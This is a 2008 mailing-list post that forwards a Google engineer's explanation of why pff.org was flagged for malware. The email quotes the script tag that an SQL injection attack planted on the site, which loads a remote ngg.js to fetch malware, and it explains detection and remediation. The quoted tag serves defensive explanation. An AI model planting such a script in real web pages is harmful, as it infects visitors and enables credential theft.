Interesting People mailing list archives
from Google -- Google blocking opinions with which it disagrees regarding "network neutrality?" EXPLAINATION?? and comment djf
From: David Farber <dave () farber net>
Date: Mon, 14 Jul 2008 09:37:15 -0700
________________________________________ From: Niels Provos [niels () google com] Sent: Monday, July 14, 2008 11:50 AM To: David Farber Cc: ip Subject: Re: Google blocking opinions with which it disagrees regarding "network neutrality?" EXPLAINATION?? and comment djf Hi David, I noticed your post on the Interesting People mailing list today. I am hoping to clear up some of the confusion and speculation. Google has been flagging sites that can infect visitors with malware for about two years. This process is completely automated. Let me give you some background on what happened with Pff.org: Pff.org uses an SQL database for storing their content. As the web application running the site did not properly sanitize user-supplied arguments, Pff.org became victim to a so-called SQL injection attack: http://en.wikipedia.org/wiki/SQL_injection http://www.youtube.com/watch?v=MJNJjh4jORY (this gives a concrete example) SQL injection is enabled by faulty server code in the web application, e.g. missing escaping of user supplied arguments. On July 11th, Google's scanners detected the following malicious code: <script src=http://www.ausbnr .com/ngg.js> The script causes malicious code to be executed in a visitor's browser with the purpose of downloading malware binaries. Malware is often used to remote control the machines of compromised users and to steal their banking credentials, etc. The problem seems to be constrained to pages under pff.org/issues-pubs/ - here is an example of what we found: <img src="../images/home/blackbullet.gif" width="14" height="14" align="absmiddle"> <a href="http://www.pff.org/issues-pubs/unavailable.html" class="menu">Eisenach, Jeffrey A. "The Digital Economy." Address at the George Mason University conference on <em>The Old Dominion and the New Economy</em>, November 1998.<script src=http://www.ausbnr .com/ngg.js></script></a><BR> Pff.org can resolve this problem by repairing their web application to properly sanitize SQL commands constructed from user input. Without properly sanitizing user-supplied arguments, the site will likely get compromised again in the future - there is a surge in SQL injection attacks at the moment. To make our processes more transparent, we are providing a Safe Browsing Diagnostic page that contains detailed information: http://www.google.com/safebrowsing/diagnostic?site=pff.org/issues-pubs/ We also email web masters when their site gets flagged and provide further information to site owners via the web master console. Technical details about the malware detection infrastructure can be found in a technical report we made available in February: http://googleonlinesecurity.blogspot.com/2008/02/all-your-iframe-are-point-to-us.html Let me know if you need more information. Niels. ------------------------------------------- Archives: https://www.listbox.com/member/archive/247/=now RSS Feed: https://www.listbox.com/member/archive/rss/247/ Powered by Listbox: http://www.listbox.com
Current thread:
- from Google -- Google blocking opinions with which it disagrees regarding "network neutrality?" EXPLAINATION?? and comment djf David Farber (Jul 14)